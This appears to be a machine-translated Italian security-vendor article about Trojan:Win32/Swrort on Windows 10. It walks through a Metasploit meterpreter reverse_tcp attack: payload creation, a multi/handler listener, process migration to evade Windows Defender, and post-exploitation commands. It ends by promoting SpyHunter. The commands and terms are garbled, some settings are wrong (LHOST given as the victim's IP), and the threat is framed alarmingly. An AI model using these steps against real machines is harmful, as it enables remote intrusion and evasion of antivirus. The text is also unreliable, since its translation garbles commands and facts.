| Nome | Trojan:Win32 / Swrort |
| Tipo | Trojan |
| breve descrizione | Leggere e scrivere le autorizzazioni in Windows 10. Consente l'attaccante di infettare altri PC collegato a quello infetto. |
| Sintomi | Apparendo di un file exe sconosciuto. |
| Metodo di distribuzione | Messaggi di spam. Attacchi MITM, reindirizzamenti dannosi. |
| Strumento di rilevamento | Scarica SpyHunter, Per verificare se il sistema è stata colpita da Trojan:Win32 / Swrort |
Un pericoloso exploit è stato scoperto in Windows 10, usando un Trojan:Win32 / Swrort di bypassare Windows Defender e di ottenere permessi di lettura e scrittura. Anonimo ricercatore ha dimostrato la vulnerabilità da un canale, detto Metasploitstation. Lui mostra 3 fasi in cui si può scivolare passato di Windows 10 difese. Non c'erano informazioni scoperto finora se questo exploit è stato corretto o no.
Windows 10 Multihandler Exploit Infezione – Come farlo?
Nel video, l'utente tech-savvy ha dimostrato una simulazione di un file '123.exe', che crea ed esegue come se fosse stato aperto nel mondo reale come allegato ad una e-mail o eseguito da un altro metodo. Abbiamo deciso di dividere il processo di infezione in tre fasi per aiutare a capire meglio la metodologia.
Fase 1: file Preparazione
L'hacker crea un carico utile con questa configurazione in ambiente Linux:
→msfpaayload finestre / metro preternaturale / reverse_tcp Lhost =
portnumber1 * – Questa è la porta utilizzata per l'attacco. Può essere qualsiasi porta (4444, 4324, eccetera). Abbiamo scritto portnumber1 dal momento che utilizza un secondo portnumber che abbiamo chiamato
Dopo questa fase è completa e il file viene creato l'attaccante e lasciò cadere sul sistema dell'utente, l'attaccante può procedere alla fase 2.
Fase 2: Utilizzando l'exploit.
A questo punto, l'attaccante Multihandler utilizza per renderlo visualizzare il file exe e sfruttare l'exploit per aprire una sessione attiva(Collegare) al PC vittima.
Questo può accadere utilizzando le righe di comando attuali:
→msfconsole (Per avviare la console. Apre 'MSF>' interfaccia)
In 'MSF' l'attaccante può eseguire i seguenti comandi:
→MSF> uso exploit / Multi / gestore
set Lhost 'indirizzo IP vittima’
Impostare lport 'portnumber1’
Dopo di che, l'attaccante esegue il carico utile per stabilire una sessione:
→msfexploit(gestore)> Imposta payload finestre / metro preternaturale / reverse_tcp
Per verificare se una sessione attiva è possibile, l'attaccante scrive il comando msfexploit(gestore)> Mostra opzioni che gli consentono di vedere questo
→processo exitfunc Si Tecnica Exit(accettato: seh, filo..)
Lhost vittima indirizzo IP sì ascolto porto
LPORT portnumber1 sì ascolto indirizzo
Questo gli permette di vedere che lui configurato correttamente le impostazioni e può procedere con l'infezione effettivo del computer.
Fase 3: Infezione
Il comando che l'attaccante utilizza per avviare una sessione attiva con la vittima è 'sfruttare'. Dopo l'esecuzione di questo comando, il file '123.exe' ritornò con questa risposta:
→[*] Iniziato gestore inversa su
[*] Avvio del gestore payload…
A questo punto, l'eseguibile è stato avviato sulla macchina Windows. Nonostante il fatto che il software Windows Defender è in esecuzione, non si è fermata l'attacco. Tuttavia quando sottoposto a scansione antivirus, il programma antivirus di Windows immediatamente rilevato '123.exe' come un cavallo di Troia:Win32 / Swrort.A.
Per evitare il rilevamento, l'attaccante usato una tattica, chiamato migrazione che ha creato un file 'notepad.exe' che migra la sessione attiva da '123.exe' per questo file al momento della connessione. Ciò è stato fatto utilizzando il comando:
→meterpreter> Post eseguire / windows / gestire / migrate
Dopo la migrazione del processo e ripetendo la stessa simulazione ma usando
Da lì, l'attaccante ha dimostrato completo in lettura e scrive le autorizzazioni con la creazione di una nuova cartella con un nuovo documento di testo. Per quanto ne sappiamo i principali comandi che possono essere utilizzati dopo il collegamento sono:
→> Sysinfo - per mostrare la versione e le informazioni di sistema.
> dir :/
> Shell - per mostrare la versione per Windows e altre informazioni.
> Getwid - mostra di Windows ID.
> Ps -aux - visualizza tutti i file .exe in esecuzione in Task Manager di Windows.
> Ifconfig - visualizza informazioni sulle interfacce (Gli indirizzi IP e altre informazioni). Questo comando dà l'attaccante le informazioni per la connessione a un altro computer che si trova nella stessa scheda di rete e VLAN con il PC infetto. Questo può essere molto devastante per le reti domestiche o in ufficio nel caso in cui tale attacco è ben organizzato.
Windows 10 Gesta – Conclusione
Non ci sono informazioni reali sulla necessità o meno questo exploit è stato fissato, ma come con qualsiasi altro software, ci possono essere quelli più scoperte. Questo è il motivo per cui nel caso in cui si utilizza Windows 10, si consiglia di scaricare e installare avanzato programma di protezione dal malware. Sarà attivamente proteggere voi e aggiornarsi regolarmente con le più recenti minacce. Anche, tale programma ha scudi attivi in grado di rilevare immediatamente eventuali connessioni non autorizzate.
Spy Hunter scanner rileva solo la minaccia. Se si desidera che la minaccia da rimuovere automaticamente, è necessario acquistare la versione completa del tool anti-malware.Per saperne di più sullo strumento SpyHunter Anti-Malware / Come disinstallare SpyHunter
